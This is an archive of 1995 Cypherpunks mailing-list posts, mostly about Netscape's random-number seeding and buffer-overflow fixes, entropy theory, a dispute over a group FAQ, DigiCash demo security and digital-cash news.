bug Stock prices from MIT's stock price history server and the Wall Street Journal. Cypherpunk dates from Sameer's Hack Netscape Page (not sure when Ray posted). Press anouncement dates from Netscape's home page. Any typos or mistakes from me. -- Jeff Simmons jsimmons at goblin.punk.net From alano at teleport.com Tue Sep 26 14:07:26 1995 From: alano at teleport.com (Alan Olsen) Date: Tue, 26 Sep 95 14:07:26 PDT Subject: [More NOISE] Re: Netscape for OS/2, when? (Re: Another Netscape Bug) Message-ID: <199509262107.OAA19327@desiree.teleport.com> At 09:30 AM 9/26/95 EDT, Sentiono Leowinata wrote: >I wish Netscape will port it to OS/2 (already ask them, but no comment >from Netscape). I don't try it on Netscape 1.1N as it doesn't run >reliably under Win-OS/2 (10 min -> crash! ;) According to Netscape they will *NEVER* support OS/2. (They have made the statement a number of times.) They seem to think that OS/2 will never amount to much. (They may be right...) | Minister of Forced Caffinization in the DNRC | alano at teleport.com | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From jsw at netscape.com Tue Sep 26 14:33:25 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Tue, 26 Sep 95 14:33:25 PDT Subject: Security Update news release In-Reply-To: <9509251617.ZM167@tofuhut> Message-ID: <9509261428.ZM150@tofuhut> > Do the new versions use PGP's randseed.bin? If Netscape even only looks at > data used to keep PGP secure, Netscape will be banned from my computer > and every computer I am responsible for. -- For good. Rather than get into a big fight about how safe it is for netscape to be reading PGPs randseed.bin file, I've changed our code to not do it. Instead of reading ~/.pgp/randseed.bin, we now get the name of a file from the environment variable NSRANDFILE, and pass that file's contents throught the RNG seed hash. If you decide that its safe, you can set the env variable to point to your randseed.bin file, or any other file of random bits you care to use. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From vznuri at netcom.com Tue Sep 26 14:45:12 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Tue, 26 Sep 95 14:45:12 PDT Subject: cypherpunk press releases vs. FAQ In-Reply-To: Message-ID: <199509262141.OAA24578@netcom8.netcom.com> earlier I advocated a press release mechanism, and this is getting flamed to smithereens by the more libertarian/cryptoanarchists elements of the group, as I predicted (but geez, accusing me of *deliberately* trying to start a flamewar here really hurts my feelings! if I were really that mischievous, the meager return would be quite an insult to my expertise.. ). however this is entirely a matter of phasing of the question. I am *not* advocating that someone be elected the spokesman, that everyone agrees on what he says, that we all agree it is our "official representation" etc. and I thought I made this clear. (oops, I used that "we" word again, my humble apologies. just pretend that I'm talking to my tentacles if you object.) I do believe these are valuable attributes of groups and can help knit cohesion and help determine meaningful agenda (people here sometimes complain about the lack of focus or of conquest, and do you need any clue as to *why* there is a lack of this?) but I will not promote it where it is not relevant (or at leas, not welcomed). what I had in mind was a more FAQ-like cypherpunks document, with a list of who considers themself a cypherpunks contributer, or just someone who is willing to be a listed expert on a topic for media inquiries. all the time, someone just sits down and writes a FAQ for a newsgroup, yet there was no "official" appointment. if a FAQ is continually updated, it becomes very much like a press release. a question on the list might be, "what exactly did the cypherpunks discover about netscape? what is the seriousness of this flaw?" etc. in this way the questions become virtually identical to what the media would inquire. and in a sense every newsgroup's FAQ is almost like a "press release" for everyone in the newsgroup. but this also shows why a FAQ is almost invariably *extremely* time consuming and a herculean task to compile/update involving huge numbers of man-hours the refined, final product does not convey. I am advocating that individuals here come up with a FAQ. there are excellent web sites, but not a simple FAQ of this group. I also encourage competing FAQs at first. this happens all the time in newsgroups, and they eventually merge or cover different topics. the FAQ topic has been discussed here often, and everyone agrees it is a pretty good idea, and someone should "just do it" if they want to. I guess what I'm pointing out (beyond the usual noise on the subject) is that if anyone wants to have cypherpunk press releases, that energy is better channelled into a FAQ. it is a definite vacuum that would beneficially be filled, IMHO. (the TCM cyphernomicon, while admirable, is not really a FAQ imho..) I am *not* advocating that (or rather, I say that we *should not*) vote on a FAQ writer, decide what is the *official* FAQ for the group if there are competing ones, bar or *discourage* some people from creating a FAQ, etc. what I want to point out is that the FAQ is a model by which a very anarchic group of people can come to a definite document by which they communicate their "findings" and their concerns, and everything else that occupies their brains daily. this happens through the FAQ writer as a conduit. in a sense, the FAQ writer is the unappointed "spokesman" for the group. he wins approval through the gradual process of people using the document and not through any other means. another alternative that actually seems to be enjoying some success is for individual cypherpunks to issue press releases pertaining to their own specialty. i.e., "so-and-so at company X announced that they would be doing so-and-so in conjunction with the cypherpunks". again, how can anyone object to this if there really is no such thing as a "cypherpunk group"? their press release certainly can't be in conflict with something that doesn't exist. the sword cuts both ways, although the rabid elements on this list would rather not admit it: if no one is a cypherpunk, if there is no "official" goal or leader, if the term is not owned by anyone, then anyone can define "cypherpunk" to be anything they want, and do anything they like under that title. as soon as you say, "well, they're not a cypherpunk if so-and-so", well, your pretty much violating your own premise: that there is no such thing as a "cypherpunks group" or "official agenda". it seems to me that the opposition to group organizing etc. in this group is related to something else: the idea that the most valuable conquests come from individual tinkerers who are not part of any "group", who pursue their own ideas at the ignorance or hostility of the rest of "society" (another cypherpunk 4-letter word, of course). this is related to the idea of doing things in secret, too. "the most valuable projects are those that are kept secret, pursued by only one or a few, and then unleashed on the world all at once." these are interesting and enticing ideas, and I don't deny them to some degree (there are many famous historical examples, such as arguably Tesla, Ramanujan, Fermat, Archimedes, etc.), but it is also true, IMHO, that there are certain things that cannot be accomplished without a certain degree of organization and cooperation among many elements.. (well, again a cryptoanarchist heresy, but hell, I'm pretty good at those). but fortunately a FAQ does not require the latter, although it can benefit immensely from it (the sci.crypt FAQ has a group of collaborating writers, as to many other FAQs). --Vlad Nuri From dvw at hamachi.epr.com Tue Sep 26 14:56:30 1995 From: dvw at hamachi.epr.com (David Van Wie) Date: Tue, 26 Sep 95 14:56:30 PDT Subject: More on "Entropy" Message-ID: <30687699@hamachi> David Van Wie wrote: >>The entropy E is defined by the sum across n states of -P_i log_2(P_i), Timothy C. May wrote: >Hah! Another physicist converted to the information-theoretic view of entropy! Indeed. I was able to track down the literature, and it is most interesting. I am still a little bit skeptical of the "superset including thermodynamic entropy" school of thought, but I haven't finished reading all of the materials yet! Clearly, the IT "version" of entropy is a well defined and useful thing.... >I should've pointed out in my reading list that several names stand out in >this interpretation: I'll read with that endoresement in mind. Your thoughts on rigorous, _concise_, design criteria for sources of entropy would be appreciated (unless there is good quality work in the literature I haven't come to yet). dvw From dvw at hamachi.epr.com Tue Sep 26 14:56:32 1995 From: dvw at hamachi.epr.com (David Van Wie) Date: Tue, 26 Sep 95 14:56:32 PDT Subject: `Random' seed. Message-ID: <30687693@hamachi> Matt Blaze wrote: >Here's my current favorite quick-and-dirty true-random-in-software generator. >Use at own risk and read the comments carefully... [...] > * Physically random numbers (very nearly uniform) > * D. P. Mitchell > * Modified by Matt Blaze 2/95 [...] > * WARNING: depending on the particular platform, truerand() output may > * be biased or correlated. In general, you can expect about 16 bits of > * "pseudo-entropy" out of each 32 bit word returned by truerand(), > * but it may not be uniformly diffused. While this comment provides some general information, it does not give the expected entropy in the form of testable assumptions. A first step in this direction is to provide the entropy series used to arrive at the 16 bit per 32 bit word estimate. The second step, as I recommended last week (RE: RNG Resource FAQ... on 9/22), is to provide a concise argument drawn directly from the mathematical weaknesses of the entropy series. In that post, I posed the following four criteria because they address the mathematical (theoretical) weaknesses of the entropy series, while using a vocabulary that should be sensible to a rigorous designer: 1) The states exist and can be identified. 2) The number of states n is known. 3) The index value i uniquely identifies a state. 4) The function P_i is known and well-behaved. In this way, an analyst can review both the entropy series itself, and a _concise_ statement of the criteria under which the series is defined (i.e. when the 4 mathematical weaknesses have been appropriately addressed), and the argument "why" has been scrutinized against the code or proposed design. dvw From dvw at hamachi.epr.com Tue Sep 26 14:57:20 1995 From: dvw at hamachi.epr.com (David Van Wie) Date: Tue, 26 Sep 95 14:57:20 PDT Subject: Netscape "random" number seed generator code available Message-ID: <3068769F@hamachi> Phil Karlton wrote: >[You will be expected to show your work. :-)] In the spirit of showing work, how about a run through your entropy series? dvw From eb at comsec.com Tue Sep 26 15:09:57 1995 From: eb at comsec.com (Eric Blossom) Date: Tue, 26 Sep 95 15:09:57 PDT Subject: Cypherpunks Lite In-Reply-To: <9509232307.memo.6018@BIX.com> Message-ID: <199509262133.OAA21492@comsec.com> > Would the person who does this, or someone who can point me at him, contact > me via e-mail please? Hi, Eric here. I publish Cypherpunks Lite. What can I do for you? Let me know if you have any other questions. Eric Here's my standard blurb: ---------------- Thanks for your interest in Cypherpunks Lite. I provide a moderated version of the Cypherpunks list called "Cypherpunks Lite". A one year subscription costs US$20 and is payable by check or money order to "COMSEC Partners". Cypherpunks Lite is available in either individual messages or a more-or-less daily message digest. The content of both are the same. In either case, I forward approximately 5 - 10% of the total Cypherpunks feed. This works out to about 5 - 10 messages / day. To take a look at what you can expect there is an archive of the previous selections organized by month at ftp://ftp.crl.com/users/co/comsec/cp-lite. The files with the extension .gz are compressed using gzip. If you would like to subscribe, please send payment to: COMSEC Partners 1275 Fourth Street, Suite 194 Santa Rosa, CA 95404 USA Be sure to provide the email address you want us to use, as well as indicating your preference for individual messages or the digest. Thanks again, Eric Blossom From an215712 at anon.penet.fi Tue Sep 26 15:21:03 1995 From: an215712 at anon.penet.fi (an215712 at anon.penet.fi) Date: Tue, 26 Sep 95 15:21:03 PDT Subject: Banks eyeball sci-fi style identification for ATMs Message-ID: <9509262156.AA26030@anon.penet.fi> Date: Sun, 24 Sep 1995 10:20:05 PDT NEW YORK (American Banker) - Biometric identification, a process formerly seen only in futuristic movies and high-security government offices, may soon become part of the most common consumer banking transactions. Bankers' interest in biometric ID -- a sophisticated antifraud measure that exploits the fact that every human possesses unique physical characteristics -- dates back more than a decade. But until recently most banks and equipment manufacturers have watched the development of technology that recognizes fingerprints, voices, and other personal traits from a distance. That has begun to change, experts said. One of the companies leading the charge toward everyday use of biometric identification in banking is Sensar Inc., a Princeton, N.J.-based company that is developing an automated teller machine application for its patented Iriscan process. According to experts, the eye is one of the most unique parts of the human body and the iris biometric more reliable than virtually any other, including fingerprints and voice. Voices change over the course of a life, and fingerprints sometimes disappear on people who work with their hands. By contrast, the iris, which is the colored area of the eye, is stable throughout a lifetime. They are thoroughly unique and naturally visible. In a nutshell, the company's product, to be sold under the name Irisident, is being designed to capture an image of a consumer's eye and match it to an image on file before authorizing an ATM transaction. ``The research that's been done with consumers indicates they like the idea of having biometric verification -- it gives them a feeling of greater security,'' said Liam Carmody, a principal with the Ridgewood, N.J.-based consulting firm Carmody & Bloom. ``But they don't want intrusive verification.'' Sensar officials understand that the use of the eye as an identification tool is likely to meet with skepticism from some bankers, who wonder whether consumers will rebel against it. However, they said their ATM application -- which should be available in prototype in the next few months -- is being designed to address the consumer concerns. And they insist that Irisident products will be of practical use to bankers. ``We are operating under the assumption that the consumer is not going to put his eye up to something to be scanned,'' said Kevin McQuade, vice president of strategic business development at Sensar. ``The breakthrough here is the ability to obtain the image of the eye unintrusively,'' said Thomas Drury, president and chief executive of Sensar, which is a unit of the David Sarnoff Research Center Inc., also based in Princeton. Several influential companies have committed money to the development of an ATM application for Sensar's technology, including Huntington Bancshares Inc., OKI Electric Industry Ltd., and a money-center bank that does not want to be identified. Though the bankers declined to discuss their investment in the project, OKI Electric has committed a minimum of $25.8 million for development funding in return for the exclusive rights to market the products in Japan, where the Tokyo-based company is the leading vendor of ATMs. Experts said this support shows that the financial services industry is looking for alternatives to the personal identification numbers and computer passwords that have been compromised with increasing frequency in recent years. The choices are many, and include fingerprints, on-line signature verification, and even the measurement of facial thermal zones. ``Bankers are interested in alternatives to the PIN,'' said V. John Stroia, a marketing manager with Diebold, Canton, Ohio. Diebold and IBM operate an ATM joint venture known as InterBold. ``The major barrier is not so much the technology as getting the customer acclimated to'' using biometric technologies. But, he added, capturing sensitive biometric data -- such as that from the eye or face -- ``is going to have to be covertly done.'' ---------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. If you reply to this message, your message WILL be *automatically* anonymized and you are allocated an anon id. Read the help file to prevent this. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From jsw at neon.netscape.com Tue Sep 26 15:22:07 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Tue, 26 Sep 95 15:22:07 PDT Subject: WSJ on Netscape Hole 3 In-Reply-To: Message-ID: <449ucq$f5d@tera.mcom.com> In article <199509252300.QAA29812 at infinity.c2.org>, sameer at c2.org (sameer) writes: > He's -asking- for an exploit. Tshirts to Ray and the person who > does the exploit, if it gets written. Maybe I should just ring up 8lgm and > have them do one. > > > > > > On Mon, 25 Sep 1995, John Young wrote: > > > > > The Wall Street Journal, September 25, 1995, p. B12. > > > > > Marc Andreessen, vice president of technology at Netscape, > > > said the company will issue fixes for the recent glitches > > > later this week. He added that it's unclear whether > > > anything other than temporarily crashing a user's computer > > > could result trom the recent flaw. > > > > Oh Marc, you didn't really want to say that, did you? > > > > -Thomas > > I asked Marc about this one, since it bothered me too. Apparently Jared asked Marc if he was aware of specific examples of how this bug might be exploited. Marc replied that we had not seen anything other than what was already posted on cypherpunks. Since the original article did not use quotes, I assume that what was written was a paraphrase, and as such it has been interpreted by the author. That said, we take this problem seriously, and have taken steps to fix it. The patch that will be released tomorrow will include fixes for this buffer overflow, and others that we found during a review of all of our code. I think it would be more constructive to pound on the new version than one that is known to be busted, and will be patched by tomorrow. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From eb at comsec.com Tue Sep 26 15:25:03 1995 From: eb at comsec.com (Eric Blossom) Date: Tue, 26 Sep 95 15:25:03 PDT Subject: The Fortezza random number generator is not trustworthy In-Reply-To: <199509232254.PAA11243@ix8.ix.netcom.com> Message-ID: <199509262156.OAA21527@comsec.com> > On a technical note, I would have thought that Fortezza and/or CAPSTONE used > some sort of hardware RNG, i.e. noisy Zener diodes or whatever. I've seen it > mentioned on this list that some other NSA secure phones, such as STU-III, > do that. I was under the impression that a seed for the RNG is loaded into the Fortezza at initialization time. This would make me think that they are using a cryptographically strong PRNG. This would give data that appears random, but is completely determined by the initial state. I suspect that the "seed keys" provided by the two agencies used to program the Clipper chips has the same properties. This makes the question about how does the NSA get access to the key escrow database moot. They don't need access. They know a priori all the unit keys. From ponder at wane-leon-mail.scri.fsu.edu Tue Sep 26 15:31:07 1995 From: ponder at wane-leon-mail.scri.fsu.edu (P.J. Ponder) Date: Tue, 26 Sep 95 15:31:07 PDT Subject: Internet draft on MIME/PGP Message-ID: Don't want to start another MIME war, but thought some on the list might be interested in this. ---------- Forwarded message ---------- Date: Tue, 26 Sep 95 15:10:57 -0400 From:Internet-Drafts at CNRI.Reston.VA.US To: IETF-Announce: ; Subject: I-D ACTION:draft-elkins-pem-pgp-00.txt A New Internet-Draft is available from the on-line Internet-Drafts directories. Title : MIME Security with Pretty Good Privacy (PGP) Author(s) : M. Elkins Filename : draft-elkins-pem-pgp-00.txt Pages : 3 Date : 09/25/1995 This document describes how Pretty Good Privacy (PGP) can be used to provide privacy and authentication using the Multipurpose Internet Mail Extensions (MIME) security content types described in RFCXXXX (draft-ietf-pem-sigenc-03.txt). Internet-Drafts are available by anonymous FTP. Login with the username "anonymous" and a password of your e-mail address. After logging in, type "cd internet-drafts" and then "get draft-elkins-pem-pgp-00.txt". A URL for the Internet-Draft is: ftp://ds.internic.net/internet-drafts/draft-elkins-pem-pgp-00.txt Internet-Drafts directories are located at: o Africa Address: ftp.is.co.za (196.4.160.8) o Europe Address: nic.nordu.net (192.36.148.17) Address: ftp.nis.garr.it (192.12.192.10) o Pacific Rim Address: munnari.oz.au (128.250.1.21) o US East Coast Address: ds.internic.net (198.49.45.10) o US West Coast Address: ftp.isi.edu (128.9.0.32) Internet-Drafts are also available by mail. Send a message to: mailserv at ds.internic.net. In the body type: "FILE /internet-drafts/draft-elkins-pem-pgp-00.txt". NOTE: The mail server at ds.internic.net can return the document in MIME-encoded form by using the "mpack" utility. To use this feature, insert the command "ENCODING mime" before the "FILE" command. To decode the response(s), you will need "munpack" or a MIME-compliant mail reader. Different MIME-compliant mail readers exhibit different behavior, especially when dealing with "multipart" MIME messages (i.e., documents which have been split up into multiple messages), so check your local documentation on how to manipulate these messages. For questions, please mail to Internet-Drafts at cnri.reston.va.us. Below is the data which will enable a MIME compliant mail reader implementation to automatically retrieve the ASCII version of the Internet-Draft. From jsw at netscape.com Tue Sep 26 17:26:57 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Tue, 26 Sep 95 17:26:57 PDT Subject: real randomness for netscape - user clicking mouse In-Reply-To: <199509270005.UAA16643@frankenstein.piermont.com> Message-ID: <9509261708.ZM150@tofuhut> On Sep 26, 8:05pm, Perry E. Metzger wrote: > > I still think that the low bits of the mouses X and Y positions as the > > user moves the mouse around the screen are a very good source of random > > bits for Netscape. > > Agreed. In case it is not clear from our previous postings, our patched version will continually feed position and time of user events through the RNG hash, in addition to any seeding that we do on startup. In the case of X, we use both the X event time from the server, and the current time (based on the highest resolution clock available in the client). --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From perry at piermont.com Tue Sep 26 17:27:37 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 26 Sep 95 17:27:37 PDT Subject: real randomness for netscape - user clicking mouse In-Reply-To: Message-ID: <199509270005.UAA16643@frankenstein.piermont.com> Vincent Cate writes: > While it is true that on some versions of X you can watch mouse events on > other peoples computers, it is also true that on some versions you can > watch keyboard input. On my secure systems, when a machine running X has to be on an insecure network, I compile the X server so that it physically lacks the ability to speak to the network -- it does all its IPC via unix domain sockets. However, you are correct that most people don't take precautions like I do. > At CMU Bennet Yee wrote a program to get peoples > passwords as they typed them in using X's poor/non-existent security back > then. This was before xauth. Xauth isn't secure, as folks have shown. > I still think that the low bits of the mouses X and Y positions as the > user moves the mouse around the screen are a very good source of random > bits for Netscape. Agreed. Perry From jsw at neon.netscape.com Tue Sep 26 17:28:10 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Tue, 26 Sep 95 17:28:10 PDT Subject: Netscape for OS/2, when? (Re: Another Netscape Bug) In-Reply-To: <199509261223.JAA01800@bud.peinet.pe.ca> Message-ID: <44a4kt$jda@tera.mcom.com> In article <199509261223.JAA01800 at bud.peinet.pe.ca>, sentiono at cycor.ca (Sentiono Leowinata) writes: > On Tue, 26 Sep 1995 05:58:19 -0400 (EDT) you wrote: > > >> It's not an exploit script, but you can find an auto crash "animation" > >> for Ray's discovered bug on > >> http://hplyot.obspm.fr/~dl/netscapesec/c1.html > >> (or click from the updated http://hplyot.obspm.fr/~dl/netscapesec/) > >Crashes the 16-bit Windows version 1.1N. > >DCF > > Same here. For more information (not Netscape related), Web Explorer > 1.02 for OS/2 also crashes for the long URL. > I wish Netscape will port it to OS/2 (already ask them, but no comment > from Netscape). I don't try it on Netscape 1.1N as it doesn't run > reliably under Win-OS/2 (10 min -> crash! ;) My understanding is that OS/2 is supposed to be windows compatible, as in "better Windows than Windows". If our windows app doesn't run on OS/2, then isn't it IBM's bug, not ours? --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From perry at piermont.com Tue Sep 26 17:30:39 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 26 Sep 95 17:30:39 PDT Subject: cypherpunks press releases/contact list In-Reply-To: <199509261623.AA00939@october.ducktown.org> Message-ID: <199509262341.TAA16602@frankenstein.piermont.com> mkj at october.ducktown.org writes: > For better or worse, in the media we ARE a group, I don't care. Anyone claiming to represent "cypherpunks" will be lying -- at the very least, they will not be representing Tim May, and they will not be representing me. Given that there is no organization, you can't get the organization to agree on anything anyway. If you claim to represent the group, you'll just be lying. No one is going to be representing "Perry Metzger", either. I don't want anyone on earth pretending to represent me, as I'm the only person who can state my views authoritatively. Who gives a damn, anyway? Its not as though we have a "cypherpunks" reputation to uphold. If you want to get associated with something, go out and crack a cryptosystem on your own. Quit thinking "group". Perry From wilcoxb at taussky.cs.colorado.edu Tue Sep 26 17:32:07 1995 From: wilcoxb at taussky.cs.colorado.edu (Bryce Wilcox) Date: Tue, 26 Sep 95 17:32:07 PDT Subject: weak links in DigiCash system Message-ID: <199509262333.RAA01743@taussky.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- Jerod, I'm forwarding your message to a couple of lists. I thought you made good points. Of course DigiCash is only running a demo, but still-- why demo poor security? I think it doesn't make a good impression. Bryce, signatures at end - ------- Forwarded Message To: ecash-feedback at digicash.com cc: netherto at taussky.cs.colorado.edu, wilcoxb at taussky.cs.colorado.edu Subject: Security in your ecash project. Date: Tue, 26 Sep 1995 17:00:15 -0600 From: Jerod D Netherton I have a couple of problems/complaints with your ecash project. When I was sent my Acct ID and Passwd they were sent to me plain text instead of being PGP-encrypted first. This means that some malicious hacker could have intercepted the e-mail message and stolen the free cyber-bucks you were so generous as to give me. Second, on the WWW-page where one downloads the software it does not seem to do a secure connection between my browser and your server (on netscape there is a small key in the lower-left hand corner that is supposed to show when one is securely connected to a secure server). So someone could sniff my password from the transaction when I GET the software. Also When I'm buying/selling things it would be smart for all parties involved to be using PGP, and I think you should stress this point more in your page. Otherwise this is another vulnerable point in your system IMHO. Thank you for your time. /\ The Scottish Claymore of All CyberSpace UgradLab DumpMeister /\ Watcher of Anime. Addictor to Muds. WebMaster of OAA at CU! < E A N O R JaDuN Comes. Shade and Sweet Water \/ Yuri, Miyu, Nene, Ranma-chan, Ryoko, B-ko! \/ Anime, Chivalry, and Physics Forever!!!! Finger for PGP Key Email:netherto at colorado.edu Phone:(303)786-8311 Pager:(303)610-1203 http://ugrad-www.cs.colorado.edu/~netherto/Home.html Lab:(303)492-6207 - ------- End of Forwarded Message signatures follow To strive, to seek, to find and not to yield. bryce at colorado.edu http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Automatic PGP clearsigning under Unix with Bryce's Auto-PGP v1.0 iQCVAwUBMGiNz/WZSllhfG25AQHFMAQApc6Td8e6bQsBqpCU+EnfbYhueJthyYPS rkHfFrenHNwG/MCEFtwXBBxEQP3yyvnY2qD9RrrhC3cN0HcFw2jE8r++2Y3Z9H7u dJuIKodi2LP8POoW6dJPlW93N5E/+LhuCZvfqe78T2bIl20GIYQ5x0UUTm+APo2f MLu6wUEAHTE= =ofwj -----END PGP SIGNATURE----- From perry at piermont.com Tue Sep 26 17:32:21 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 26 Sep 95 17:32:21 PDT Subject: cypherpunk press releases vs. FAQ In-Reply-To: <199509262141.OAA24578@netcom8.netcom.com> Message-ID: <199509270032.UAA16680@frankenstein.piermont.com> "Vladimir Z. Nuri" writes: > earlier I advocated a press release mechanism, and this is getting > flamed to smithereens by the more libertarian/cryptoanarchists > elements of the group, as I predicted (but geez, accusing me > of *deliberately* trying to start a flamewar here really hurts > my feelings! if I were really that mischievous, the meager return would > be quite an insult to my expertise.. ). So you admit that you are, in fact, Detweiler. As if there was any doubt. > what I had in mind was a more FAQ-like cypherpunks document, There is nothing wrong with Tim's document, which already exists. Perry From gorkab at sanchez.com Tue Sep 26 17:33:57 1995 From: gorkab at sanchez.com (Brian Gorka) Date: Tue, 26 Sep 95 17:33:57 PDT Subject: Windows MixMaster Client Message-ID: <00996F95DAD78CE0.0000381E@sanchez.com> Does anyone out there have a windows mixmaster client? (or a pointer to one?) Also, I am having a LOT of grief trying to get the alpha.c2.org remailer to work for me... (yes, I have the help files) Could someone walk me through it? From rfb at lehman.com Tue Sep 26 17:35:26 1995 From: rfb at lehman.com (Rick Busdiecker) Date: Tue, 26 Sep 95 17:35:26 PDT Subject: Hack Microsoft? In-Reply-To: <199509261433.AA11352@ibm.net> Message-ID: <9509262257.AA28908@cfdevx1.lehman.com> Date: Tue, 26 Sep 95 10:33:07 EDT From: Dan Bailey For fun ways to hack NT, check out http://www.somar.com/security.html. Thanks for the pointer. The URL is acutally http://www.somar.com/security.htm (no `l'), but it's easy to find as a link near the top of http://www.somar.com/ -- Rick Busdiecker Please do not send electronic junk mail! net: rfb at lehman.com or rfb at cmu.edu PGP Public Key: 0xDBD9994D www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html send mail, subject "send index" for mailbot info, "send pgp key" gets my key From rah at shipwright.com Tue Sep 26 17:35:38 1995 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 26 Sep 95 17:35:38 PDT Subject: Netscape Stock Prices Message-ID: At 4:45 PM 9/26/95, Jeff Simmons wrote: >Date High Low Close Volume > >950809 75.000 53.750 55.500 3851.8 : : >950925 69.000 62.250 67.000 684.0 WSJ article re: overflow bug Yup. Looks like the old "wall of worry" trick to me. Stand back and let the train go buy folks, madness of crowds and all that. Actually, Netscape is still the only game in town as far as Wall Street goes. What the market needs is a foregone alternative, and some lucky sailor to mistake a tulip bulb for an onion... Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From imschira at nyx10.cs.du.edu Tue Sep 26 17:44:32 1995 From: imschira at nyx10.cs.du.edu (Ian M. Schirado) Date: Tue, 26 Sep 95 17:44:32 PDT Subject: (fwd) FBI COMPUTER FRAUD WEB SITE DIVISION Message-ID: <9509270000.AA22231@nyx10.cs.du.edu> Path: mnemosyne.cs.du.edu!uunet!in2.uu.net!noc.near.net!das-news2.harvard.edu!oitnews.harvard.edu!newsfeed.rice.edu!news.sesqui.net!news.concom.com!news From: Rick Casimir Newsgroups: misc.forsale.computers.pc-specific.misc Subject: FBI COMPUTER FRAUD WEB SITE DIVISION Date: 21 Sep 1995 17:47:42 GMT Organization: Connections.Com Lines: 9 Message-ID: <43s8fu$r4t at carbon.concom.com> NNTP-Posting-Host: dial139.concom.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Mailer: Mozilla 1.1PE (Windows; I; 16bit) HELLO, If you or someone you know who has been scammed or did"nt ship you products after you prepaid or for whatever reason who screwed you. REPORT THEM TO THE FBI: -- -- http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information To be a skeptic is to refuse to be a victim. "This is my .sig. There are many like it, but this one is mine." Freedom...yeah, right. From jsw at neon.netscape.com Tue Sep 26 17:50:03 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Tue, 26 Sep 95 17:50:03 PDT Subject: New Netscape RNG In-Reply-To: <199509250649.CAA27099@clark.net> Message-ID: <44a728$jda@tera.mcom.com> In article , drc at russell.moore.com (David R. Conrad) writes: > I also noticed that they use $HOME/.pgp/randseed.bin under unix, but > they don't bother with %PGPPATH%\RANDSEED.BIN on PCs. I've sent Jeff > a private message about this. As noted in a previous message, I've replaced the hardcoded randseed.bin with an environment variable that names a file to pass through the seed hash. This is only on the unix version for now, but I plan to put it into the PC version for 2.0. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From karlton at netscape.com Tue Sep 26 17:54:15 1995 From: karlton at netscape.com (karlton) Date: Tue, 26 Sep 95 17:54:15 PDT Subject: Netscape as vehicle for cypherpunk agenda/the cypherpunk bully pulpit In-Reply-To: <199509251741.KAA04656@infinity.c2.org> Message-ID: <3068A092.31E4@netscape.com> sameer wrote: > I haven't seen any mention of this feature in 2.0, so if the > feature exists in 2.0, then great! Otherwise, unless Netscape is going > to allow for alternte cert agencies on a specific timescale, I think > we have to do something about it in order to force the issue. Netscape has already annonced that for 2.0, the user will be able to accept (trust) (or reject) any set of certificate authorities for signing of certificates. I briefly looked for a copy of that announcement, but I could not find it. PK -- Philip L. Karlton karlton at netscape.com Principal Curmudgeon http://www.netscape.com/people/karlton Netscape Communications Corporation From jya at pipeline.com Tue Sep 26 17:57:49 1995 From: jya at pipeline.com (John Young) Date: Tue, 26 Sep 95 17:57:49 PDT Subject: CHA_cha Message-ID: <199509270057.UAA29759@pipe1.nyc.pipeline.com> Worth Magazine, October, 1995, has a longish, easy-reading, supportive article on David Chaum and digital cash. Virtually alone among E-money thinkers, Chaum insists on creating anonymity for all transactions -- building a tamper-proof system that works just as "real" cash always has, from cowne shells to $100 bills. The key, he says, is this: Without the spender's say-so, no one should be able to trace who paid whom for what, whether a transaction takes place online or in a swipe of a card at a coffee shop. It's a libertarian approach in tune with Chaum's roots in freewheeling communities such as Berkeley and Amsterdam -- but it is anathema to control freaks like the FBI, the IRS, and corporate information marketers. Chaum says every digital-cash system but his has the potential to be abused or compromised -- and the math seems to bear him out. His competitors, however, insist their plans will prove plenty secure in practice. They dismiss Chaum as an incorrigible purist, a brilliant mathematician and innovator whose political views are hindering his chances of success. Like many in the digital elite, Chaum, an unabashed utopian, does want to create a new world. To him, electronic money is just the first consumer use of an arcane field he hopes will transform society: cryptology, the science of secret codes. In cyberspace, these codes can prove a powerful way of shielding a person's identity -- or of verifying an identity without giving away extra information. Armed with personal computers and good software, says Chaum, ordinary people will finally have the power to do and say things without being tracked by Big Brother. CHA_cha (31 kb in two parts) From jsw at neon.netscape.com Tue Sep 26 18:01:01 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Tue, 26 Sep 95 18:01:01 PDT Subject: Netscape as vehicle for cypherpunk agenda/the cypherpunk 